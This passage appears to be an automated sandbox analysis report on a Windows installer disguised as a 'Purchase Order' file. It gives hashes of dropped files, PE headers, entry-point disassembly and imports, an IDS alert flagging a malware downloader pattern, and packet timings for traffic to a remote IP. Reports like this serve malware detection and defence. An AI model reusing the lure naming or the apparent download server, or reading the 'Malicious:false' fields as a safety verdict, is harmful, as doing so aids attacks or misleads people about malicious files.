                                            SSDEEP:96:Jh/2gZ62nmh8h8hMA8cZZ5wq1dJlH999YqYYYSJ9nv79i2+7nllbx0:j+gZ62nypZsqnJlH999Lv7I7a
                                            MD5:1732F2BFFA1308AABB19AA7006DFE151
                                            SHA1:80974B7DC8AFF2267C3502433C9DBDCCE04BD68C
                                            SHA-256:F99C88579EF1BF9BE2A9442D6E0B61BAC01BE74E9EC96A844D3CE0E49E89B889
                                            SHA-512:9DE1E2D1028E9FC4938CA1A4DE274513632319B411E2E1797DAAC80AD1D8C220ABD410612DDA28B6FA58BAD6A591234A675AEA0AE29B0EF75E9776BE91993C1C
                                            Malicious:false
                                            Reputation:low
                                            Process:C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):290718
                                            Entropy (8bit):1.2554775771524807
                                            Encrypted:false
                                            SSDEEP:768:tCp+qklylxDqcoTQYGEujA28gHCxgzdobjCp3zxBMpnz4G+KrbwdmCClgE+JQH0/:+DqcWd2ikx8zkwT0sH7FZJ9dmMg9Fb
                                            MD5:C3ACEFE77EA0A60EFDFBC53EF527E6DD
                                            SHA1:84064B562F74D054254FDC6012E83248F4C10DB2
                                            SHA-256:01AB1D43FD91C8715A0FE5D4D3EA6A4DFD0FF6DCA3BFE95DE026B97DD246260B
                                            SHA-512:01B8D1253A15345F35304860BC91AC0EFE9DFD4AE91022326DD1E509C0CC37BE401DE24AA2096B4C2B17D7B965F904C80ECCDB4157C1FD366FA90226DE198D1E
                                            Malicious:false
                                            Reputation:low
                                            Process:C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):484483
                                            Entropy (8bit):1.2566608257372598
                                            Encrypted:false
                                            SSDEEP:1536:k00wcig7ANvjuzHnVWM5DNgLiOavUv9tkj8:Wwci1O1WABgT92j8
                                            MD5:BDF9F6FA5F7851BD46CFAD3859D1D2CA
                                            SHA1:9352199243642CAD95D4870883238F1E06E3D13D
                                            SHA-256:AF12000C4E3E6C57CE444368D50A3E7F737647C0DECD597AAA307F26C0B1BFBF
                                            SHA-512:A99C33BCB4D65AF35FA970BDB84332FCC7C284C2017F135C81DE28EC4D1867E1F341CB6A0DCD1B254E816DD2D435FC469536F9D8779FB10455BAF6846FE1A625
                                            Malicious:false
                                            Reputation:low
                                            Process:C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):281853
                                            Entropy (8bit):7.7902641113783515
                                            Encrypted:false
                                            SSDEEP:6144:qv8q7vHyznD3c0MG0KXtSYaAzhtG1CDta+0kLbYMLezAL1T8K8P/k:lKfqbcX/ySYaAbG1QJLkMMALNbEs
                                            MD5:63B84085F6C377FCB26E75EBD1F83BE4
                                            SHA1:6E6A61DCD1CB093FAC560085E5DC384E3F5C3E66
                                            SHA-256:B63205EDDA324ADC71C16D51D5C4169CEBA89794FAEAF1D0F5809AAEFF256840
                                            SHA-512:F4F43853270F28C405C4FD386094058A5FB9138D237411C60B08FCD97AE176414F8049A0626FD9F02C7571EBAE200AB5FDB4C20896E873B0FDEE23443EFF815C
                                            Malicious:false
                                            Reputation:low
                                            Process:C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe
                                            File Type:MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hide
                                            Category:dropped
                                            Size (bytes):1434
                                            Entropy (8bit):3.1879819702714474
                                            Encrypted:false
                                            SSDEEP:24:8m7WLgD4/BV02Dejq8wky+pu8wWyjC0ee4jqy:8bgDszhee8w4pu8w3C0eejy
                                            MD5:3E748CD3854E8659E17051729D6DF4EE
                                            SHA1:CB8A77BB37F774F4879FD07B5D7723EA7AD870CE
                                            SHA-256:D1CFCDCB89837792648DC1669AE5F6B1EA4F167B75A16BDE008D98C5278E9F78
                                            SHA-512:319BD36211BF5463C92E3C97C437C14B600FECCD0ABAFBB38BE937160F762BF4D1683F447BFCC6C2CE3C06728118E0011634FD78A7DE36A88B7A8FB1C102C23B
                                            Malicious:false
                                            Reputation:low
                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                            Entropy (8bit):7.618058158790601
                                            TrID:
                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                            • DOS Executable Generic (2002/1) 0.02%
                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                            File name:Purchase Order Purchase Order Purchase Order Purchase Order.exe
                                            File size:724'333 bytes
                                            MD5:b9a03fb0c2c7f23a1e4ccb0d79c5053c
                                            SHA1:4d87c4ed89d8b92f2b6849dc6af6a8850f8e5e7c
                                            SHA256:099369eb025c3e23b6669c872ac2572e7bc4ba9200eb4d6318284983ddb78e3f
                                            SHA512:7b39c7eb08b12f947a2f5fb79f91a7c8fb738fa14c2539db55f207754438f5b340d5ae5219ec1ea6861cb72aad32e04d2b701cc6a34c098e0a780db3607be3d2
                                            SSDEEP:12288:d35ol8MJEBhQRtZZbhhLSbWJgU8UFJ6UibZP9/I7TAWWtQnm:d3kJEBORt7b3Oa2Udi9P9yTB0Qnm
                                            TLSH:46F4E061227BCC66F38492B04556E23D8EA6EEC62971C33757F2EF5BB518F723818211
                                            Icon Hash:7b3b5a7232162613
                                            Entrypoint:0x40338f
                                            Entrypoint Section:.text
                                            Digitally signed:false
                                            Imagebase:0x400000
                                            Subsystem:windows gui
                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                            Time Stamp:0x5A6FED3C [Tue Jan 30 03:57:48 2018 UTC]
                                            TLS Callbacks:
                                            CLR (.Net) Version:
                                            OS Version Major:4
                                            OS Version Minor:0
                                            File Version Major:4
                                            File Version Minor:0
                                            Subsystem Version Major:4
                                            Subsystem Version Minor:0
                                            Import Hash:b34f154ec913d2d2c435cbd644e91687
                                            Instruction
                                            sub esp, 000002D4h
                                            push ebx
                                            push esi
                                            push edi
                                            push 00000020h
                                            pop edi
                                            xor ebx, ebx
                                            push 00008001h
                                            mov dword ptr [esp+14h], ebx
                                            mov dword ptr [esp+10h], 0040A2E0h
                                            mov dword ptr [esp+1Ch], ebx
                                            call dword ptr [004080A8h]
                                            call dword ptr [004080A4h]
                                            and eax, BFFFFFFFh
                                            cmp ax, 00000006h
                                            mov dword ptr [00434EECh], eax
                                            je 00007F039D125443h
                                            push ebx
                                            call 00007F039D1286F5h
                                            cmp eax, ebx
                                            je 00007F039D125439h
                                            push 00000C00h
                                            call eax
                                            mov esi, 004082B0h
                                            push esi
                                            call 00007F039D12866Fh
                                            push esi
                                            call dword ptr [00408150h]
                                            lea esi, dword ptr [esi+eax+01h]
                                            cmp byte ptr [esi], 00000000h
                                            jne 00007F039D12541Ch
                                            push 0000000Ah
                                            call 00007F039D1286C8h
                                            push 00000008h
                                            call 00007F039D1286C1h
                                            push 00000006h
                                            mov dword ptr [00434EE4h], eax
                                            call 00007F039D1286B5h
                                            cmp eax, ebx
                                            je 00007F039D125441h
                                            push 0000001Eh
                                            call eax
                                            test eax, eax
                                            je 00007F039D125439h
                                            or byte ptr [00434EEFh], 00000040h
                                            push ebp
                                            call dword ptr [00408044h]
                                            push ebx
                                            call dword ptr [004082A0h]
                                            mov dword ptr [00434FB8h], eax
                                            push ebx
                                            lea eax, dword ptr [esp+34h]
                                            push 000002B4h
                                            push eax
                                            push ebx
                                            push 0042B208h
                                            call dword ptr [00408188h]
                                            push 0040A2C8h
                                            Programming Language:
                                            • [EXP] VC++ 6.0 SP5 build 8804
                                            Name | Virtual Address | Virtual Size | Is in Section
                                            IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8608 | 0xa0 | .rdata
                                            IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x63000 | 0x308e8 | .rsrc
                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x2b0 | .rdata
                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                            Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                            .text | 0x1000 | 0x6627 | 0x6800 | 8c030dfed318c62753a7b0d60218279b | False | 0.6642503004807693 | data | 6.452235553722483 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                            .rdata | 0x8000 | 0x149a | 0x1600 | 966a3835fd2d9407261ae78460c26dcc | False | 0.43803267045454547 | data | 5.007075185851696 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            .data | 0xa000 | 0x2aff8 | 0x600 | 939516377e7577b622eb1ffdc4b5db4a | False | 0.517578125 | data | 4.03532418489749 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                            .ndata | 0x35000 | 0x2e000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                            .rsrc | 0x63000 | 0x308e8 | 0x30a00 | f3073287865b6dba616e9c916f34371a | False | 0.4013245099614396 | data | 5.74891499046254 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                            RT_BITMAP | 0x633e8 | 0x368 | Device independent bitmap graphic, 96 x 16 x 4, image size 768 | English | United States | 0.23623853211009174
                                            RT_ICON | 0x63750 | 0x10a00 | Device independent bitmap graphic, 128 x 256 x 32, image size 67584 | English | United States | 0.25190906954887216
                                            RT_ICON | 0x74150 | 0x9600 | Device independent bitmap graphic, 96 x 192 x 32, image size 38016 | English | United States | 0.2941666666666667
                                            RT_ICON | 0x7d750 | 0x7600 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.9859970868644068
                                            RT_ICON | 0x84d50 | 0x5600 | Device independent bitmap graphic, 72 x 144 x 32, image size 21600 | English | United States | 0.309093386627907
                                            RT_ICON | 0x8a350 | 0x4400 | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | English | United States | 0.35167738970588236
                                            RT_ICON | 0x8e750 | 0x2600 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.38003700657894735
                                            RT_ICON | 0x90d50 | 0x1200 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.4377170138888889
                                            RT_ICON | 0x91f50 | 0xa00 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | English | United States | 0.508203125
                                            RT_ICON | 0x92950 | 0x600 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.4524739583333333
                                            RT_DIALOG | 0x92f50 | 0x144 | data | English | United States | 0.5216049382716049
                                            RT_DIALOG | 0x93098 | 0x13c | data | English | United States | 0.5506329113924051
                                            RT_DIALOG | 0x931d8 | 0x100 | data | English | United States | 0.5234375
                                            RT_DIALOG | 0x932d8 | 0x11c | data | English | United States | 0.6056338028169014
                                            RT_DIALOG | 0x933f8 | 0xc4 | data | English | United States | 0.5918367346938775
                                            RT_DIALOG | 0x934c0 | 0x60 | data | English | United States | 0.7291666666666666
                                            RT_GROUP_ICON | 0x93520 | 0x84 | data | English | United States | 0.7803030303030303
                                            RT_MANIFEST | 0x935a8 | 0x33e | XML 1.0 document, ASCII text, with very long lines (830), with no line terminators | English | United States | 0.5542168674698795
                                            DLL | Import
                                            KERNEL32.dll | SetEnvironmentVariableW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, SetCurrentDirectoryW, GetFileAttributesW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, ExitProcess, GetShortPathNameW, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, lstrcmpiW, MoveFileW, GetFullPathNameW, SetFileTime, SearchPathW, CompareFileTime, lstrcmpW, CloseHandle, ExpandEnvironmentStringsW, GlobalFree, GlobalLock, GlobalUnlock, GlobalAlloc, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, lstrlenA, MulDiv, MultiByteToWideChar, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
                                            USER32.dll | GetSystemMenu, SetClassLongW, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, GetDC, SetTimer, SetWindowTextW, LoadImageW, SetForegroundWindow, ShowWindow, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, CreateDialogParamW, SendMessageTimeoutW, wsprintfW, PostQuitMessage
                                            GDI32.dll | SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                            SHELL32.dll | SHGetSpecialFolderLocation, ShellExecuteExW, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW
                                            ADVAPI32.dll | AdjustTokenPrivileges, RegCreateKeyExW, RegOpenKeyExW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, RegEnumValueW, RegDeleteKeyW, RegDeleteValueW, RegCloseKey, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                                            COMCTL32.dll | ImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                            ole32.dll | OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
                                            Language of compilation system | Country where language is spoken | Map
                                            English | United States |
                                            Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                            2024-11-18T18:11:16.708256+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.8 | 49711 | 185.222.57.90 | 80 | TCP
                                            Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                            Nov 18, 2024 18:11:16.715029001 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:16.715101004 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:16.715137005 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:16.715154886 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:16.715171099 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:16.715204954 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:16.715265989 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:16.822288036 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:16.822371006 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:16.822390079 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:16.822427034 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:16.822463036 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:16.823030949 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:16.823048115 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:16.823093891 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:16.823123932 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:16.823517084 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:16.823533058 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:16.823548079 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:16.823568106 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:16.823594093 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:16.824194908 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:16.824212074 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:16.824246883 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:16.824270964 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:16.824548006 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:16.824564934 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:16.824593067 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:16.824610949 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:16.937824965 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:16.937918901 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:16.937931061 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:16.937935114 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:16.937978029 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:16.937978029 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:16.938359976 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:16.938371897 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:16.938419104 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:16.938836098 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:16.938846111 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:16.938853025 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:16.938916922 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:16.939455986 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:16.939521074 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:16.940246105 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:16.940329075 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:16.940390110 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:16.940402031 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:16.940448046 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:16.940836906 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:16.940848112 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:16.940887928 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:16.941266060 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:16.941276073 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:16.941315889 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.086539984 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.086565971 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.086582899 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.086817026 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.087001085 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.087018967 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.087090969 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.087404013 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.087419987 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.087435007 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.087460041 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.087480068 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.088102102 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.088119030 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.088162899 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.088557005 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.088573933 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.088591099 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.088618994 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.088654995 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.099957943 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.100008011 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.100178003 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.168196917 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.168276072 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.168306112 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.168333054 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.168346882 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.168365955 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.168581009 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.168591976 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.168623924 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.168884039 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.168936014 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.169150114 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.169161081 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.169292927 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.171137094 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.171148062 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.171164036 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.171175003 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.171185017 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.171205997 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.171232939 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.171466112 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.171540976 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.171680927 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.171693087 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.171755075 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.171755075 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.172089100 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.172100067 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.172151089 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.173605919 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.173626900 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.173665047 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.173691988 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.215079069 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.215157032 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.215161085 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.215194941 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.283687115 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.283709049 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.283778906 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.283803940 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.283845901 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.284146070 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.284161091 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.284174919 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.284190893 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.284218073 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.284431934 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.284447908 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.284473896 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.284502983 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.284703970 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.284754992 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.286096096 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.286159992 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.286348104 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.286366940 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.286389112 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.286417961 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.286997080 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.287014961 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.287046909 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.287062883 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.287341118 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.287357092 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.287385941 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.287403107 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.287595034 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.287638903 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.288760900 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.288808107 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.288846970 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.288888931 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.330436945 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.330501080 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.330549955 CET4971180192.168.2.8185.222.57.90
